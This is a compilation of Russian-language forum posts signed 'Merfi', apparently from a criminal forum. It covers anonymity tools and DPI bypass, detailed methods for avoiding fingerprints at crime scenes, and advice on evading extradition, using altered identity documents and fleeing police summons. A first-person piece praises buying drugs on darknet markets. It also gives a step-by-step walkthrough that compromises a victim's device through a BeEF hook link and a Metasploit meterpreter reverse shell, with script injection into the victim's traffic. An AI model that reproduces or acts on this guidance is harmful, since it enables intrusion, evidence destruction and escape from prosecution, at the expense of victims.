OpenVPN — самое популярное решение для создания защищенного соединения. Этот протокол открыт и предоставляет самую серьезную защиту, поэтому ему можно доверять. Настройка соединения вряд ли займет больше пары минут.
SoftEther — мультиклиент для работы как с описанными выше протоколами, включая OpenVPN, так и со своим собственным, не менее безопасным, чем OpenVPN.
В таблице ниже — небольшое резюме по этим решениям.

Tor
Tor (The Onion Router) — одно из лучших средств для обеспечения анонимности в Сети. Схема работы подразумевает трехкратную защиту данных и анонимизацию трафика.
Как описано в самом названии, Tor использует так называемую луковую маршрутизацию: твои данные — это сердцевина лука, а их защита — слои вокруг. Так, каждый из промежуточных серверов Tor снимает свой слой защиты, и только третий, последний из них, достает сердцевину и отправляет запрос в интернет.

Работу всей системы обеспечивают тысячи энтузиастов по всему миру, борющиеся за права человека и приватность. Благодаря этому для каждого отдельного сайта строится собственная цепочка промежуточных серверов Tor, что дает полную защиту: каждый сайт — новая личность.
Большой плюс Tor — стабильность работы и большая забота об анонимности: благодаря усердиям многих специалистов он работает даже в Китае, стране, которая широко известна своим строжайшим подходом к блокировкам и наказаниями за их обход.
Для упрощения жизни пользователям разработчики создали Tor Browser, основанный на Firefox, и улучшили его дополнениями, запрещающими сайтам следить за тобой. Например, HTTPS Everywhere заставляет веб-сайты использовать шифрование, а NoScript отключает выполнение скриптов на странице, фактически запрещая собирать любые данные пользователя.
Скачать Tor, как и прилагающийся к нему браузер, можно на официальном сайте проекта Tor Project.

 

[Merfi]

Краткий справочник анонима. Виды шифрования и защиты трафика, выбор софта​

DPI
К сожалению, все эти средства могут оказаться бесполезными, если твой провайдер начал блокировки с применением DPI (Deep Packet Inspection) — системы глубокого анализа сетевого трафика. Цель DPI — отбрасывать все, что не похоже на работу обычного человека за обычным компьютером, то есть блокировать любую подозрительную активность. А все способы анонимизации трафика априори подозрительны, поэтому программы зачастую дают сбои или в принципе отказываются работать.
Но и с этим можно бороться. Почти для каждой из описанных возможностей защищать канал связи есть надстройки, помогающие обходить зоркое око анализаторов DPI. Например, Shadowsocks имеет встроенную защиту от DPI и притворяется, что выполняет обычное подключение к удаленному серверу.
OpenVPN сам по себе легко различим, но stunnel позволяет также обойти анализ пакетов. Stunnel маскирует канал VPN под соединение SSL, которое с виду безобидно: это может быть и простой браузер, который обращается к сайту по HTTPS. Благодаря этому заблокировать такой туннель непросто. Если перестараться, можно заблокировать вообще все.
Обходить DPI также помогает tls-crypt, режим, введенный в версии OpenVPN 2.4, который шифрует трафик VPN.
Создатели Tor Browser специально работают над обходом средств анализа DPI. При подключении к сети Tor можно воспользоваться транспортом-прослойкой, которая обеспечивает беспрепятственное подключение к первому серверу защищенной сети. Этот транспорт можно либо выбрать из списка (это общедоступные серверы), либо получить персональный на официальном сайте Tor Bridges.
Лучше всего себя показывает obfs4 — это обфускатор, перемешивающий передаваемые данные так, что в Сети их нельзя определить. DPI обычно пропускает такие пакеты, поскольку не может предположить, что находится внутри.
Еще есть несколько программ, которые пытаются тем или иным способом обмануть анализ пакетов, например разбивая их на мелкие части или меняя заголовки. В их числе GoodbyeDPIили Green Tunnel с простым графическим интерфейсом — они не скрывают ни IP, ни данные, но обходят блокировку.
Кардинальным решением можно считать проект Streisand, его русское описание есть на GitHub. Это палочка-выручалочка в мире безопасности данных. Эта утилита всего за несколько минут развертывает и настраивает на удаленном сервере сразу несколько сервисов для защиты данных, а также дает подробную инструкцию по ним.


Итог
Для сохранения нашей с тобой интернет-безопасности и анонимности придумано множество технологий самого разного уровня. Часть из них проверена временем, другая помогает против новейших методов цензуры. Благодаря этому мы еще можем оставаться невидимыми, нужно лишь не забывать пользоваться этой возможностью.

 

[Merfi]

Как скрыть свои отпечатки пальцев​

Немного теории в начале.

Отпечатки получается благодаря тому, что на кончиках пальцев постоянно выделяется жир и пот. Это, вкупе с мертвым слоем эпителия, остается на практически любых поверхностях. Притом, чем больше человек отдален от состояния спокойствия, тем интенсивнее работают сальные и потовые железы, а соответственно отпечатки проступают яснее. Толщина слоя не помню уже сколько, но ничтожно мала, несколько НМ.

Процедура снятия отпечатков проста до безобразия.

На предмет с отпечатком наносится кисточкой магнитный порошок(раньше использовалась сажа), который сцепляется с потожировыми следами, являя их невооруженному глазу. Так же используются в криминалистике специальные камеры и уф-лампы, показывающие опять-таки потожировые следы.
После занесения цифрового отпечатка в программу, та, используя специальный алгоритм, составляет формулу вашего отпечатка в текстовом виде. Затем эта формула в течении считанных секунд сверяется с базой данных и выдает совпадения.

Кому стоит опасаться в первую очередь данной темы?

Тем, по отношению к кому проводилась процедура дактилоскопии. Это прежде всего бывшие преступники, служащие силовых структур, военнослужащие, даже уволенные в запас. А если у вас не брали отпечатки, то это облегчает вам жизнь, но. Если улики укажут на вас, то пренепременно у вас возьмут ваши отпечатки и очень удивятся, что на объекте состава преступления найдены такие же.

Не могу не упомянуть, что схема выявления потожировых отпечатков пальцев кардинально отличается от тех, которые располагают на электронных замках и системах безопасности. Там считывается структура кожи с самого пальца. К чему я это? Не путайте, видел тему о подделке отпечатков пальцев. Подделать-то вы их подделываете, только это не годится для того, чтобы оставлять чужие отпечатки на предметах. Конечно, если не брать во внимание то, что пленку с рельефом отпечатков другого человека можно смазать смесью из жира, например свиного, либо чего-то похожего. Хотя эксперт все равно догадается. Вы ведь не будете мазать этот липовый отпечаток СВОИМ потом и жиром?
На выбор предлагаю наиболее приемлемые варианты (социальную маскировку с перчатками не рассматриваю, это дело вашей фантазии. Примеры - медбрат, санитар (с одноразовым латексом, если не на руках, а в сумке; велосипедист, дворник, монтажник и тд.)).

Итак, приступим к мини-обзору.

1. Клей БФ-6
Это не БФ-2, который намертво клеит к себе пластмассу и металлы, это специальный медицинский клей для залечивания ран, ожогов и тд. Покупается в аптеке. Образует на руках защитную пленку, застывая в течение нескольких минут. Держится неплохо.

2. Напалечник
Покупается в аптеке, неплох, но может палиться людьми.

3. Бесцветный лак для ногтей
Держится отлично, почти не палится и смывается дома жидкостью для снятия лака. Жидкость для снятия лака лучше брать с ацетоном, так быстрее. И в зависимости от вида лака бывают эластичные и ломкие. Ломкие нам не нужны. Но тут ничего не могу посоветовать, не особо в этой теме разбираюсь. лучше спросите у своей девушки.

4. Жидкие перчатки
Специальный состав, образующий пленку на руках и закупоривающий поры из которых выделяется жир/пот. Держится на руках до первого контакта с водой. Довольно хороший и удобный метод, но, по моим данным, не каждый конкретный продукт подходит для этих целей. По цене сильно варьируются, начиная от 100 руб и заканчивая парой тыс. Я брал в интернет магазине, под торговой маркой Saphire.

5. Скотчевые полоски
Блестят, конкретное палево и нулевая чувствительность

6. Пищевая пленка
Лучше чем скотч по парметру чувствительности, да и держится неплохо на пальце.

7. Лейкопластырь
Не буду расписывать, но добавлю лайфхак для маскировки. Перед обмоткой подушечки, натираете кутикулу(кожа такая рядом с ногтем) песком до покраснения и шелушения, заливаете йодом/зеленкой и сверху можно мазнуть черным фломастером и растереть. И вот у вас готова легенда о дерматологическом заболевании пальцев со страшным названием Тропическая гемангиома Мавсисяна. Если по сабжу - смотрите в гугле фото по запросу: дерматологические болезни пальцев, выбираете похожий и запоминаете название болезни. Но это лишнее, скорее для параноиков(или предусмотрительных)

8. Силиконовый прозрачный герметик
Мне встретился впервые в автомобильном магазине. Тюбик стоил порядка 200 руб. Отличное средство с одним минусом - застывать может довольно долго, но! Открою вам лайфхак. Мажете пальцы маслом(лучше техническим), чтобы потом легко снять слой силикона. Обмазываете силиконом пальцы(если толщина слоя будет большая, вам будет некомфортно в них работать, т.к. отсутствует чувствительность пальцев, если маленькая, то, когда вы будете снимать свой силиконовый напалечник, есть риск того, что он порвется, выбирайте золотую середину). Равномерно распределяете по пальцам и ждете, ждете, ждете, пока он полностью не застынет. Снимаете.. И вот у вас готова ваша собственная вторая кожа. Кстати, есть фишка: пока не нанесли силикон на пальцы, положите отрезанную тоненькую полоску кожи(либо чего-то другого, на вашу фантазию) на ноготь, так чтобы край полоски выступал за палец настолько, чтобы за него можно было быстро схватить. После нанесения герметика, подкорректируйте ее положение в силиконе, чтобы она находилась примерно в середине слоя. Зачем это все делать? чтобы "кожа" снималась максимально быстро и удобно

9. Тампон со спиртом
Бутылек спирта и ватные тампоны. Протираете пальцы, в результате чего растворяется/смывается пот, жир и эпителий. Для безопасной работы нужно помнить, что это действует в течение 2-3 минут после протирки, затем железы снова начинают свое коварное дело.

10. Гель для рук на спиртовой основе
Специфика та же, что и в п.9, но после намазывания, стоит вытереть руки об штаны/рубашку, чтобы стереть растворенную в спирте массу. Осторожно, не каждый гель содержит достаточно большую концентрацию спирта. Определить ее можно опытным путем, нанеся с пальца каплю на верхнюю часть кончика языка. Ну или просто глянув на этикетке)
Из минусов - кроме спирта остаются на поверхности вспомогательные вещества типа глицерина и тд, которые так же могут быть обнаружены и на ваших руках, либо в бутыльке с гелем

11. Салфетки спиртовые
Не те, которые продаются в магазинах, они для изнеженных солярием девушек, а не для суровых минеров, лаборантов и клиентов. Нам нужны те, которые продаются в аптеках по 1 в пачке.
Самое лучшее на мой взгляд, среди спиртосодержащих методов.

12. Бытовая химия
Примеров множество: всевозможные растворители, бензин, ацетон и тд. Один огромный минус - на руках остаются следы/запах. А принцип действия смотрите в п.9

13. Тальк
Слышал, но лично не сталкивался, хотя теоретически имеет место быть. Но лучше не рисковать. Да и не комильфо ходить с белыми руками по городу.

14. Перчатки
Тут все понятно, но наиболее лучшие перчатки - латексные осмотровые одноразовые. Продаются в аптеках.

Внимание: часть отпечатка может остаться на перчатке, а затем и на предметах, если вы ее лапаете с внешней стороны. Но я бы не стал из-за этого переживать, качество отпечатка будет ужасное. Так же можно с помощью экспертизы определить в этих ли перчатках совершалось преступное деяние. Палит нас в данном случае тальк и мелкие частицы, остающиеся на предмете, на руках и на перчатке. С шерстяными - аналогично. палит ворс и частицы.

Да, если будет установлена осознанная попытка скрытия отпечатков, то плюсов вам это точно не даст.

Отличный способ проверки работоспособности этих методов.

Контрольный тест перед заездом. Берете зеркальце, прикладываете к нему палец сильно, аккуратно убираете и смотрите результат. Если сразу не видно, то не значит, что отпечатка не осталось! Поджигаете коптящую свечу(церковные дешевые неплохо подойдут) и держите ее над стеклом несколько минут, собираете сажу на среднюю или толстую кисточку для рисования и проводите по зеркальцу с предполагаемым отпечатком. Слышал, что сгодится тонер для лазерных принтеров, но не уверен, можете проверить с явным отпечатком.

 

[Merfi]

Как выбрать безопасную страну для жизни​

Естественно, нюансов бесконечное количество, и в рамках статьи я могу остановиться только на самом, на мой взгляд, полезном и важном.

Что такое экстрадиция и как работает Интерпол

В большинстве случаев это не пригодится, но тяжкие и особо тяжкие преступления имеют все шансы попасть в список Интерпола.
Международная политика предполагает, что каждое государство обладает суверенитетом (властью над своей территорией и над проживающими на этой территории людьми), а значит не обязано выдавать граждан (как своих, так и иностранцев), даже совершивших преступление, другому государству.
На практике договорённость о выдаче преступников и подозреваемых существует между многими странами, а процесс выдачи (то есть физической и юридической передачи) называется экстрадицией.
Индия, Китай, Турция и некоторые другие страны имеют двухсторонние договоры с Россией о выдаче, однако большинство стран принимают решение по запросу от России по каждому случаю индивидуально, в зависимости от многих факторов: текущие политические отношения, предыдущий опыт обмена подозреваемыми и т.д.
Если человек легально пребывает в стране, которая отказала в его выдаче, но нарушает её законы, страна может передумать и экстрадировать его, поэтому соблюдение законов страны пребывания обязательно.
По запросу Интерпола или по прямой просьбе другого государства полиция может лишь ненадолго задержать человека. Потом решение о его дальнейшем задержании под стражей и выдаче/невыдаче другому государству принимает суд, и здесь возможны варианты.
Чтобы Интерпол объявил человека в розыск, гражданин должен подозреваться в серьёзном преступлении по законам большинства стран-участниц Интерпола, а срок заключения по этому преступлению должен быть не менее 2 лет. Если между странами есть персональные договоры и соглашения, срок может быть изменён. Например, соглашение между Россией и Турцией подразумевает срок от 1 года.
Также Интерпол не объявляет в розыск людей по политическим и религиозным преступлениям и в случае, когда есть подозрения, что после выдачи к человеку могут быть применены пытки, негуманное отношение и смертная казнь. На этом основании часто отказывают в выдаче России, Украине, Казахстану, Беларуси, и адвокаты используют этот пункт для помощи в отказе в экстрадиции.

• Что говорит Конституция и/или Уголовный кодекс государства о выдаче собственных граждан за рубеж? Большинство стран мира, включая Беларусь, Украину и Россию, не экстрадируют своих граждан. В российском законодательстве это прописано в статье 61 Конституции. Популярные среди мигрантов США и Великобритания в некоторых случаях выдают своих граждан, а страны Евросоюза экстрадируют граждан в пределах ЕС.
  Отсюда следует, что хорошей идеей будет стать гражданином страны, в которой вы находитесь.
• Является ли преступлением (и какой тяжести) деяние, за которое человека требуют экстрадировать, и насколько местные власти серьёзно борются с этим? В большинстве случаев выдача возможна только когда деяние является преступлением в обеих странах. Каннабис, например, где-то легализован, а где-то нет. Также решение о невыдаче возможно, если наказание за преступление в вашей стране намного более суровое. Например, говоря о преследовании за запрещённые вещества, Новая Зеландия крайне либеральна. Вообще, законы о веществах во многих странах Европы и Латинской Америки довольно мягкие, а в Азии и США — суровые.
• Насколько легко в вашей ситуации можно получить долговременную визу, статус беженца и/или вид на жительство и остаться в этом статусе? Важно иметь прочный легальный статус в стране пребывания, чтобы не оказаться депортированным домой за просроченную визу. Отдельно стоит проверить, за какие правонарушения вас могут выслать из страны — подработка без разрешения, а то и просто серьёзное нарушение ПДД могут дорого обойтись. Важно помнить, что депортация возможна только "на родину", поэтому крайне полезно иметь двойное гражданство (желательно, чтобы второе было в стране с минимальными дипломатическими связями с первой страной), и телепортироваться на ту родину, где вас не разыскивают.
• Какова статистика экстрадиций из выбранной страны в Россию (Украину, Беларусь)? Существуют разные договоры с разными уровнями взаимодействия между странами. Наличие любого из них однозначно говорит не в пользу выбора этой страны, хотя отсутствие соглашения всего лишь означает, что страны имеют право на выдачу, но не обязанность. Например, Венесуэла, с которой соглашения нет, выдала Александра Белоусова (разыскивался за контрабанду кокаина). Вне зависимости от договоров, России ежегодно наибольшее количество людей выдают соседи: Беларусь, Украина, Казахстан и Черногория. Также часты выдачи из Испании, Германии, Франции, Австрии. Осторожными следует быть в КНР, Турции, Индии, Таиланде (прямые соглашения о выдаче). Наиболее редко из часто запрашиваемых выдают Великобритания, США, Швеция.

Для понимания масштабов: Генпрокуратура РФ сообщает примерно о 1000 запросах на экстрадицию в год, из которых не более 100 в итоге доходят до реальной выдачи.
Экстрадиция — не единственный вопрос, который может возникнуть. Если государство, где было совершено преступление, предоставит достаточно подтверждений этому, человека могут осудить в стране пребывания даже без экстрадиции, однако это очень редкий вариант.

Что на практике

На практике в розыске Интерпола около 60-70 тысяч граждан России. Среди стран, которые не входят в Интерпол, вряд ли найдётся подходящая для жизни: Северная Корея, несколько тихоокеанских островных государств и несколько непризнанных стран.
Если вы уже в федеральном розыске и ещё не успели уехать из страны, вариантов катастрофически мало, и все они нелегальны и опасны.
Если вы занимаетесь незаконной деятельностью и пока не попали в поле зрения полиции, но осознаёте риски:

• Загранпаспорт должен быть действителен ещё много лет, и лучше, если их будет 2. Каждые пару лет меняйте его, чтобы продлевать возможное время в бегах, если таковое настанет. Паспорт будет единственным спасением, если придётся уезжать внезапно, и единственным способом получить гражданство и просто ВНЖ.
• Желательно иметь несколько дополнительных документов, действительных за пределами России. Это может быть МВУ (международное водительское удостоверение), читательский билет в другой стране, удостоверение журналиста или кого-нибудь ещё и т.п. Чем больше таких бумажек, тем проще будет разговор со случайным патрулём в новой стране и тем реже придётся светить реальный паспорт. Лучше, если имя будет другим или немного изменено (Andrei превратится в Andreas, Maria в Mary). Сделайте "ID-карту": заламинируйте страницу паспорта с левым номером и фото не как в оригинальном паспорте, и предъявляйте по возможности за границей вместо заграна.
• Добираться до выбранной страны только с пересадками, и чем больше их будет, тем лучше. У государств нет единой базы туристов, и отследить человека через несколько границ очень сложно. Это относится и к случаям, когда вы не в розыске, но подозреваете, что рано или поздно к вам могут возникнуть вопросы.
• У вас должно быть несколько стран на примете, чтобы можно было быстро перемещаться между ними, желательно по суше.
• Если у вас есть роскошь планирования, летайте в Шенген часто, аккуратно и ничего не нарушая. У вас должен быть паспорт добропорядочного состоятельного гражданина, который всей душой любит Великобританию, Прибалтику и весь Евросоюз. На всякий случай.
• Если вас вызывают в полицию на "беседу" или в качестве свидетеля (а вы хозяин магазина на Гидре) — берите билет на самолёт на ближайший рейс (с самостоятельной стыковкой) куда-нибудь на Шри-Ланку, Мадагаскар или Боливию, а как будете под пальмой — начинайте думать.
• Смена личности стоит 60 000 евро, паспорт для внутреннего использования по Европе — 5 000 евро.
• Всегда имейте под рукой наличные и карту в зарубежном банке, запасные симкарты и купленный на вторичном рынке телефон. Банковскую карту можно оформить по туристической визе во многих странах.

 

[Merfi]

Нас не догонят. О крипте и даркнете: каковы тренды​

Еще несколько лет назад мало кто мог бы ответить на вопрос что такое биткоин или даркнет. Сейчас эти слова не просто у всех на слуху, это реалии современного мира, без которых существование современного интернета представить уже тяжело.
Первой крупной демонстрацией возможности биткоина стали расчеты на рынках в даркнете.
Вспомним, что, именно благодаря Silk Road о биткоине узнали за пределами технического сообщества. Только после Silk Road о криптовалюте узнали органы правопорядка. Однако, вместе с первым взлетом в цене и популярностью за биткоином закрепилась репутация валюты для наркоторговцев.
Несмотря на уже пройденный путь, сообщество сталкивается с обвинениями в том, что биткоин используется исключительно в преступных целях. Ответить на призывы запретить биткоин из-за того, что его используют преступники, можно лишь словами создателя Telegram Павла Дурова:

«Предлагаю запретить слова. Есть информация, что с помощью них общаются террористы».
Биткоин на Silk Road вывел даркнет-экономику на новый уровень, однако в течение последующих лет маркетплейсы в даркнете интернете исчезают один за другим. Dream Market, а следом и Wall Street покидают темный рынок. Какова причина вымирания столь прибыльного, хоть и незаконного бизнеса?
Два крупнейших даркнет-маркетплейса оказались на грани вымирания одновременно. Разумеется, довольно сложно найти достоверную информацию о деятельности таких незаконных предприятий, однако записи на форуме Dread и в профильных СМИ (Deep Dot Web) свидетельствуют о полном прекращении торгов на Dream Market и конфискации средств пользователей на Wall Street Market.

Dream Market

Даркнет-маркетплейсы для продажи незаконных товаров и услуг, которые используют технологии анонимизации соединения и биткоин (или альткоины) для расчетов, существуют с 2011 года. Именно тогда Росс Ульбрихт создал Silk Road, место которого впоследствии занимали многие рынки, однако все они так или иначе закрывались. И в очередной раз сложилась ситуация, в которой лидеры сектора могут прекратить существование.
Dream Market является старейшим [шесть лет] и, вероятно, крупнейшим действующим рынком в последние годы. Именно он столкнулся с проблемами первым. По данным Deep Dot Web, сайт маркетплейса, по всей видимости, подвергся масштабной DDoS-атаки, из-за чего пользователи не могли осуществлять привычную деятельность. Хакеры могли использовать уязвимость в браузере Tor, что позволило бы им максимально снизить издержки.
Остается неясным, кто стоял за атаками, однако оператор форума Dread под псевдонимом HugBunter предположил, что целью хакеров было получение выкупа от оператора Dream Market под ником Speedstepper.

«Комментируя отдельную атаку на форум Dread, HugBunter добавил, что хакеры требовали от администратора Dream Market выкуп в размере $400 тысяч, однако он отказался», — говорится в репортаже Deep Dot Web.
Некоторые пользователи предположили, что к проблемам рынка могут иметь отношение правоохранительные органы или же конкуренты, однако фактических подтверждений эти гипотезы пока не нашли.
В течение последнего месяца, после семи недель DDoS-атак, торговля на Dream Market была полностью остановлена. Администрация рынка не смогла продолжить борьбу с хакерами, сообщил Deep Dot Web со ссылкой на осведомленный источник.
Пользователи обнаружили в своих аккаунтах следующее объявление:

«Этот рынок закроется 30 апреля, в дальнейшем услуги будет оказывать партнерская компания с onion-адресом weroidjkazxqds2l.onion, который пока находится в офлайне».
Никакой информации о дальнейшей судьбе Dream Market больше не поступало и пользователям неизвестно, какая партнерская компания имелась в виду. По мнению HugBunter, рынок проводит ребрендинг, однако подтверждающих подробностей все еще нет. Кроме того, Speedstepper никак не комментировал ситуацию.
Несмотря на отключение торгов и невозможность внести депозит, пользователи могут вывести средства.
Вероятно, свет на проблемы Dream Market может пролить арест трех представителей преступной группировки Sinmed, которая являлась ведущим продавцом ПАВ на этом даркнет-рынке.

Wall Street Market и конец эры?
Как только с Dream Market возникли проблемы, пользователи начали поиски достойных альтернатив и, вероятно, оказались на Wall Street Market — втором крупнейшем рынке.
Тем не менее на Dread и Deep Dot Web появились слухи о том, что этот маркетплейс намерен устроить экзит-скам и присвоить все средства пользователей. Учитывая поток новых клиентов с Dream Market, их совокупные убытки в результате предполагаемого мошенничества могут достигнуть $30 млн. В сообщении на Wall Street Market говорилось о технических работах, однако пользователи поставили это под сомнение. Некоторые также сообщили, что один из администраторов сайта шантажировал их, угрожая слить персональные данные правоохранителям.
Это уже не первый раз, когда ключевые даркнет-рынки закрываются одновременно. После падения Silk Road в 2013 году, аналогичная судьба постигла его преемников Silk Road 2.0, Cloud 9 и Hydra в ноябре 2014 года в рамках международной операции «Onymous«. Эстафету перехватили маркетплейсы Agora, который добровольно прекратил деятельность в 2015 году, а затем и AlphaBay, доминировавший в течение 2015-2016 годов. Последний был закрыт правоохранительными органами в 2017 году.
Тогда пользователи были вынуждены мигрировать на рынок Hansa, который на тот момент уже контролировался голландской полицией. В рамках операции «Штык» были собраны пароли и другие сведения о прибывающих юзерах, после чего сайт Hansa также был закрыт, и в глубинном интернете снова освободилось первое место.
На данный момент неясно, имеют ли правоохранительные органы отношение к ситуации вокруг Dream Market и Wall Street Market. Об арестах администраторов или владельцев рынков ничего неизвестно, а сайты все еще технически в онлайне, хотя функционал и недоступен.

Рост и распространение даркнета

Несмотря на активные действия служителей правопорядка и закрытие крупнейших игроков, это не привело к исчезновению торговли в глубинном интернете. Согласно докладу аналитической фирмы Chainalysis, торговая активность в даркнете выросла вдвое только за 2018 год. После спада из-за закрытия AlphaBay и Hansa, годовой объем торгов практически достиг новых исторических максимумов на уровне $600 млн в BTC-эквиваленте.
Биткоин остается основной валютой даркнет-маркетплейсов, однако доля этого незаконного бизнеса от общего числа транзакций крайне мала — ниже 1%, хотя во времена Silk Road (2012-2013) составляла целых 7%.
Пока неясно, приведет ли крах сегодняшних лидеров даркнет-торговли к появлению аналогичных сервисов, или же преступники создадут своего рода пиринговые площадки для устранения посредников и единых точек отказа, однако с большей долей вероятности торговля незаконными товарами никуда не денется и продолжит адаптироваться под меняющиеся условия.

И что же?

На отечественных, благодаря умному менеджменту, панкики и проблем не наблюдается. Ситуация сохраняется стабильной и причин для беспокойство и тревог нет. Тем не менее сложившаяся ситуация - это повод задуматься о будущем. Ведь прогресс не стоит на месте

 

[Merfi]

Самое безумное, что можно приобрести в DarkNet'e​

Самое безумное, что я видел в даркнете на продажу — полноценная нарколаборатория. Ты реально можешь купить себе полный набор для изготовления практически любого наркотика. Там очень подробно расписано, сколько из этого получится готового товара, а уж как ты будешь им пользоваться — дело твое. Есть дилеры, которым можно продать, а они займутся распространением.
Можно купить поддельную онлайн-личность. Это значит, что для тебя создадут максимально правдоподобные страницы во всех социальных сетях под другим именем. Из очевидного, можно купить паспорт. Причем это могут быть документы любого вида сложности: загранпаспорт, обычный, биометрический — все зависит от того, сколько вы готовы за это заплатить. Много продают ворованных кредиток со всего мира. На них иногда могут оставаться какие-то деньги, но никто этого не гарантирует.
Можно купить практически все что угодно. Машину с перебитыми номерами, базу данных, любую информацию вообще. На самом деле, информация — самый продаваемый ресурс в даркнете, даже больше, чем наркотики и оружие. Кредитные карточки, номера телефонов, вычисление по номеру машины и так далее.
Кстати, можно также купить многие лекарства, которых у нас нет. Например, если ты болеешь чем-то серьезным, а у нас импортозамещение и нормальных лекарств нет, можно купить контрабанду из США. Там продают вытяжки от рака кожи, лекарства для детей с СДВГ, запрещенные успокоительные и многое другое.
Рабов, кстати, купить нельзя, как ни странно. Есть подобная фигня на совсем отбитых сайтах, но сам я не проверял, правда это или нет. На нормальных даркнетовских сайтах такие вещи запрещены, в том числе детское порно, которого и так полно в обычном интернете. Они вообще очень адекватные, очень лояльные чуваки. Видно, что там далеко не идиоты работают, и общение всегда адекватное. На некоторых нормальных даркгнтовских сайтах при регистрации есть страница, которая сразу же отсеивает дебилов — просят вбить свои паспортные данные. Естественно, какие-нибудь школьники сразу начинают это делать. Так их и отсеивают.

У этих сайтов есть очень четкие правила. Это вообще не беспредел, а очень круто организовано и жестко контролируется. Например, если что-то покупать на проверенном сайте, ты получишь, возможно, лучший сервис в своей жизни. Я недавно покупал траву, и когда пришел за закладкой — ее там не было. Я написал в администрацию, что товара нет, на что мне скидывают новый адрес, куда я еду в этот же день. Приезжаю и понимаю, что там опять ничего нет, и мне сделали третий перезаклад. У них в правилах написано, что даже второго перезаклада не делают, но если адекватно общаться, то тебе всегда идут навстречу. И так у них во всем. Если ты не дебил, то отношение будет к тебе нормальное.
На самом деле, ментам на таких сайтах делать нечего. Ну, допустим, ты хочешь купить гранату. Оформляешь покупку, приходишь на место, а там менты тебя ловят. Тебя посадят за покупку гранаты, а дальше что? Ресурсов будет затрачено больше, чем от этого пользы. Им надо ловить крутых чуваков, а их найти очень сложно. Если ты хочешь поймать продавца гранаты, купив гранату — ничего не выйдет. Поймать можно только покупателя, но смысла в этом никакого. Это очень надежная система. К тому же, деньги не сразу идут продавцу, а хранятся какое-то время у третьей стороны — самого сайта. Пока ты не подтвердишь получение заказа, продавец не получит своих денег.
Многие считают, что даркнет нужен только маргиналам и наркоманам, но это не так. Само по себе название «даркнет» мне не очень нравится. Я считаю, что весь интернет должен быть таким свободным от цензуры и анонимным. Даркнет прекрасно контролирует себя сам, это не пристанище преступников. Там есть своя «Википедия», оппозиционные сайты, форумы на любые темы. На самом деле, даркнет — почти то же самое, что интернет начала 2000-х. Нужно понимать, в чем проблема с даркнетом. Всякие тупые правозащитники начинают скидывать ответственность на интернет за то, что их дети стали наркоманами, хотя ответственность лежит полностью на родителях.

 

[Merfi]

Опасность перехода по неизвестным URL. Взлом устройств​

Поговорим о всей опасности перехода по URL от неизвестных лиц. Также будет много практики.

Каждый раз когда вы переходите по ссылке от неизвестного вам человека, задумывались ли вы о всей опасности того что вы сделали?
Переходя по ссылке вы можете не подозревать, но на вашем устройстве после перехода могут находится вредоносные программы а ваши персональные данные могут быть похищены. На примерах убедимся во всей опасности...

• Первое что может случится при переходе по ссылке это то, что злоумышленник получит доступ к вашим аккаунтам социальных сетей.
• Могут узнать ваш IP. И если вы думаете что это не страшно, то вы глубоко ошибаетесь.
• Подгрузить малварь используя exploit pack.

На мой взгляд, это самое серьезное что может произойти. Ну что, меньше теории больше практики)

Подгружаем малварь.

Exploit pack - это своеобразная связка эксплойтов.
К преибольшому сожалению я не буду показывать в этой теме использование exploit pack'а. По той простой причине, что огонь это не игрушка. Но мы все равно завладеем всем устройством пользователя когда он перейдет по ссылке. А поможет нам сегодня beef в связке с metasploit.
Beef - это фреймворк для проведения XSS атак путем заражения и дальнейшего использования.
Metasploit - фреймворк для поиска и эксплуатации уязвимостей. То есть для проведения тестирования на проникновение.

Запуск beef.

В терминале пишем
beef-xss

Переходим по ссылке http://127.0.0.1:3000/ui/authentication

Теперь нужно авторизироватся. Логин и пароль по умолчанию beef:beef.
Нам нужно чтобы "жертва" выполнила у себя скрипт hook.js
Нужно подгрузить его ей.
http://<ваш ip>:3000/demos/basic.html
Далее сократите ссылку и скиньте пользователю. Как только он переходит по ссылке на панели управления beef в разделе Online browsers появится активный браузер. Это браузер нашего пользователя.
Половина дел сделано. Теперь подключим к нашей работе metasploit. Для этого:

1. Открываем файл config.yaml у beef. Часто он находится в этой дериктории - /usr/share/beef-xss/
2. Ищем там раздел extension. У metasploit меняем значение параметра на true

1. Теперь же открываем файл /usr/share/beef-xss/extensions/metasploit/config.yaml и изменяем значение параметров у callback_host и host.
2. Запускаем metasploit и пишем следующее

msf> load msgrpc


И снова открываем файл из пункта 3. В pass вписываем получившийся с генерированный пароль. Остается сохранить.
Переходим в /usr/share/beef-xss/ и пишем
./beef -x

После этого в beef загрузятся exploit'ы.
Теперь нам доступны exploit'ы которые мы тоже подгрузили пользователю и выполнили их. Для начала я хотел бы узнать какая ОС у моего пользователя.

Выберем payload. Так как у моей "жертвы" windows я выбрал - windows/meterpreter/reverse_tcp
Заполняем все поля.
Теперь открываем msf и пишем
1. use exploit/multi/handler
2. set payload windows/meterpreter/reverse_tcp
3. set LHOST <your_ip>
4. exploit

Во второй команде пишете название пайлоада который выбрали в beef. Вот и все)
А пользователь всего-то перешел по ссылке.
А что если пользователь придерживается правил "я по незнакомым ссылкам не хожу"? На этот случай у нас имеется еще один ответ. Создаем файл hack.js с таким содержимым:
<script>
document.location.href="http://<your ip>:3000/demos/basic.html";
</script>

Запускаем xerosploit. И выбираем:
scan --> ip жертвы --> injectjs --> run --> путь до hack.js

Далее проделываем выше описанное. Вот так мы взломали не о чем не подозревающего пользователя. Будьте осторожны)

Вывод

Не стоит переходить по ссылкам от незнакомцев, это может нанести критический вред вашему устройству. А представьте себе если залить hook.js на уязвимый к xss веб ресурс? ...

 

[Merfi]

Самые коварные методы социальной инженерии
Современные системы защиты могут защитить данные практически от всего, кроме человеческого фактора. Можно воздвигнуть неприступную программную стену перед потенциальным хакером, но все труды окажутся напрасными, если наивный пользователь сам сообщит злоумышленнику пароли. «Взломать человека намного проще, чем компьютер, поскольку компьютеры следуют инструкциям, а люди – поддаются эмоциям», – утверждает Кевин Митник, один из самых знаменитых хакеров мира.
Социальная инженерия, или взлом человеческого сознания – один из самых популярных хакерских инструментов современности. Вы удивитесь, но самые коварные методы социальной инженерии практически не требуют от злоумышленника особых технических знаний. Вот несколько приемов, которые будут актуальны до тех пор, покуда существует человеческая глупость. То есть вечно.

Глупый новичок
